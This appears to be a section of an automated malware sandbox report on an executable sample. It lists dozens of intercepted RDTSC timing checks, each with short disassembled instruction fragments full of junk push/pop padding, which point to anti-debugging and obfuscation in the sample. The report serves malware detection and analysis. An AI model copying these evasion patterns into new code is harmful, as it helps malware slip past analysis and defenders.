                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55DA7 second address: D55DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55DAD second address: D55DC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD3h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55DC5 second address: D55DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55F1E second address: D55F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D55F26 second address: D55F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5C44B second address: D5C455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5C455 second address: D5C466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F0EC4502016h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5AEB3 second address: D5AEBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5AEBB second address: D5AEDB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F0EC4502016h 0x00000010 jmp 00007F0EC4502020h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5AEDB second address: D5AEE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5AEE5 second address: D5AEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5AEEB second address: D5AEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5B5E2 second address: D5B5FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0EC4502023h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5B5FB second address: D5B617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5B617 second address: D5B61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5B61D second address: D5B62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5BCCB second address: D5BCCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5BCCF second address: D5BCDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F0EC4CB7FCEh 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5C2A9 second address: D5C2B7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0EC4502016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5C2B7 second address: D5C2C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5C2C0 second address: D5C2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5C2C6 second address: D5C2F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F0EC4CB7FD0h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F0EC4CB7FD1h 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D5C2F8 second address: D5C2FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CE1D00 second address: CE1D12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D61B3A second address: D61B52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0EC4502016h 0x0000000a jmp 00007F0EC450201Eh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D254A1 second address: D1039A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0EC4CB7FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0EC4CB7FCEh 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 jmp 00007F0EC4CB7FCAh 0x00000018 mov dl, 8Fh 0x0000001a call dword ptr [ebp+122D1DBBh] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2556E second address: D25586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F0EC450201Bh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D25586 second address: D25632 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0EC4CB7FD3h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b jne 00007F0EC4CB7FCCh 0x00000011 push dword ptr fs:[00000000h] 0x00000018 stc 0x00000019 jmp 00007F0EC4CB7FCAh 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 xor cl, FFFFFFC6h 0x00000028 mov dword ptr [ebp+1248A24Ch], esp 0x0000002e mov dh, CAh 0x00000030 cmp dword ptr [ebp+122D2E3Ch], 00000000h 0x00000037 jne 00007F0EC4CB80CCh 0x0000003d push 00000000h 0x0000003f push edx 0x00000040 call 00007F0EC4CB7FC8h 0x00000045 pop edx 0x00000046 mov dword ptr [esp+04h], edx 0x0000004a add dword ptr [esp+04h], 00000015h 0x00000052 inc edx 0x00000053 push edx 0x00000054 ret 0x00000055 pop edx 0x00000056 ret 0x00000057 mov ecx, dword ptr [ebp+122D2F98h] 0x0000005d mov byte ptr [ebp+122D336Dh], 00000047h 0x00000064 mov edi, dword ptr [ebp+122D30E4h] 0x0000006a mov eax, D49AA7D2h 0x0000006f mov dx, 68E2h 0x00000073 nop 0x00000074 pushad 0x00000075 je 00007F0EC4CB7FCCh 0x0000007b jg 00007F0EC4CB7FC6h 0x00000081 push ebx 0x00000082 jnl 00007F0EC4CB7FC6h 0x00000088 pop ebx 0x00000089 popad 0x0000008a push eax 0x0000008b push eax 0x0000008c push edx 0x0000008d push eax 0x0000008e push edx 0x0000008f pushad 0x00000090 popad 0x00000091 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D25632 second address: D25649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502023h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D25A68 second address: D25AD5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jc 00007F0EC4CB7FC6h 0x00000013 popad 0x00000014 jmp 00007F0EC4CB7FD2h 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e pushad 0x0000001f pushad 0x00000020 jmp 00007F0EC4CB7FD7h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 push ebx 0x00000029 pushad 0x0000002a popad 0x0000002b pop ebx 0x0000002c popad 0x0000002d mov eax, dword ptr [eax] 0x0000002f jmp 00007F0EC4CB7FD1h 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 pushad 0x00000039 pushad 0x0000003a pushad 0x0000003b popad 0x0000003c push esi 0x0000003d pop esi 0x0000003e popad 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D25AD5 second address: D25ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D25BE7 second address: D25BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D25BED second address: D25BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D26417 second address: D2648F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F0EC4CB7FC8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 jc 00007F0EC4CB7FC6h 0x00000029 mov edi, dword ptr [ebp+122D1DBBh] 0x0000002f push 0000001Eh 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007F0EC4CB7FC8h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 0000001Bh 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b nop 0x0000004c js 00007F0EC4CB7FCEh 0x00000052 push eax 0x00000053 jnp 00007F0EC4CB7FC6h 0x00000059 pop eax 0x0000005a push eax 0x0000005b pushad 0x0000005c je 00007F0EC4CB7FCCh 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2648F second address: D26497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D26497 second address: D2649B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D265EE second address: D265F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D64ED2 second address: D64EE1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F0EC4CB7FC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D64EE1 second address: D64EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D64EED second address: D64EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D64EF3 second address: D64EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D64EF9 second address: D64F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D64F04 second address: D64F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D65056 second address: D6505C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D651F4 second address: D65211 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F0EC4502016h 0x00000011 jc 00007F0EC4502016h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D65211 second address: D65215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D6597F second address: D6598F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D6598F second address: D65993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D65993 second address: D659BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ebx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0EC4502027h 0x00000012 pop esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D659BB second address: D659C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D6B03A second address: D6B03E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D6B03E second address: D6B048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D6B048 second address: D6B04E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D6B04E second address: D6B052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CE5360 second address: CE5366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CE5366 second address: CE536B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D69B2A second address: D69B34 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0EC4502016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D69B34 second address: D69B3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F0EC4CB7FC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D69B3F second address: D69B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D69B45 second address: D69B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D69B4B second address: D69B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D6A95B second address: D6A95F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D6AAD5 second address: D6AAF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC4502025h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D6AAF0 second address: D6AAF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D7020C second address: D7021B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC450201Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D7021B second address: D7021F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D70383 second address: D70390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F0EC4502016h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D704F5 second address: D704FF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0EC4CB7FD2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D704FF second address: D70505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D7062B second address: D70630 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D70630 second address: D7063F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 js 00007F0EC450201Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D7063F second address: D70649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D727FC second address: D72803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D77E8F second address: D77E99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D77E99 second address: D77ED2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0EC4502028h 0x00000010 jmp 00007F0EC4502026h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D778BA second address: D778C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D778C6 second address: D778DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC4502024h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D778DE second address: D778F0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jbe 00007F0EC4CB7FC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D778F0 second address: D778F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D77BE8 second address: D77BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D7C312 second address: D7C321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jg 00007F0EC4502016h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D7C321 second address: D7C325 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D7C325 second address: D7C33B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F0EC450201Ch 0x00000010 jnl 00007F0EC4502016h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D7C46E second address: D7C474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D7C474 second address: D7C47D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D26240 second address: D26244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
